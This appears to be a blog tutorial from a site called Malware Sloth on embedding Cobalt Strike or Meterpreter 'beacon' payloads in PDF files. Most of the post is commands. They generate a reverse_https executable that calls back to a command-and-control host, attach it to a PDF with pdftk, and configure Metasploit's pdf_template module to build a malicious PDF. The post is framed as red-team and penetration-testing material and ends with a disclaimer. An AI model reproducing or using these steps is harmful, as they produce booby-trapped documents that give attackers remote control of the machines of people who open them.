Malware Sloth

Embedding Beacon Payloads in PDF Files

Embedding Beacon Payloads in PDF Files

Roger P.'s photo
Roger P.
·

2 min read

Welcome to Malware Sloth's guide on embedding Cobalt Strike payloads in PDF files. This tutorial is designed for security professionals and cybersecurity enthusiasts alike, offering clear, step-by-step instructions on how to effectively incorporate beacon payloads into PDF documents for penetration testing purposes.

Required Tools

Before we begin, let’s ensure we have all the necessary tools at our disposal:

  • Metasploit Framework

  • Cobalt Strike

  • PDF Toolkit (pdftk)

Method 1: Embedding Payloads with PDF Toolkit

This method involves using PDF Toolkit to embed a pre-generated executable payload into a PDF file. Here's how you can do it:

Step 1: Generate the Payload

First, you need to generate your executable payload. You can do this using msfvenom from the Metasploit framework or through Cobalt Strike, depending on your preference.

Using Metasploit:

Replace C2_IP and C2_PORT with the IP and port of your command and control (C2) server:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=C2_IP LPORT=C2_PORT -f exe > beacon.exe

Using Cobalt Strike:

You can also you cobalt strike to generate your payload. This beacon guide should help you out if your still new to the platform.

Step 2: Embed the Payload into the PDF

Now, use pdftk to embed the payload into your PDF. We’ll use input_document.pdf as our base document:

pdftk input_document.pdf attach_files beacon.exe to_page 1 output final_payload.pdf

Method 2: Generating PDF Payload via Metasploit

Alternatively, you can use Metasploit to craft the malicious PDF document.

Step 1: Prepare Metasploit

Open Metasploit and load the PDF template exploit module:

msfconsole
use exploit/windows/fileformat/pdf_template

Step 2: Configure the Payload

Set up the necessary parameters to define your payload and the output file names:

set FILENAME final_payload.pdf
set INFILENAME input_document.pdf
set OUTFILENAME bad.pdf
set PAYLOAD windows/meterpreter/reverse_https
set LHOST C2_IP
set LPORT C2_PORT

exploit

Conclusion

Big thanks for hanging in there with me! Hope you enjoy this neat little red team trick!

#SlothLife

Disclaimer
The content provided in this post is for educational purposes only. The author does not endorse or encourage any unethical or unlawful use of the information presented. Users are solely responsible for their actions, and the author bears no liability for any misuse of the material. Always adhere to ethical standards and legal guidelines when experimenting with cybersecurity techniques.

MalwareCobaltStrike#cybersecurity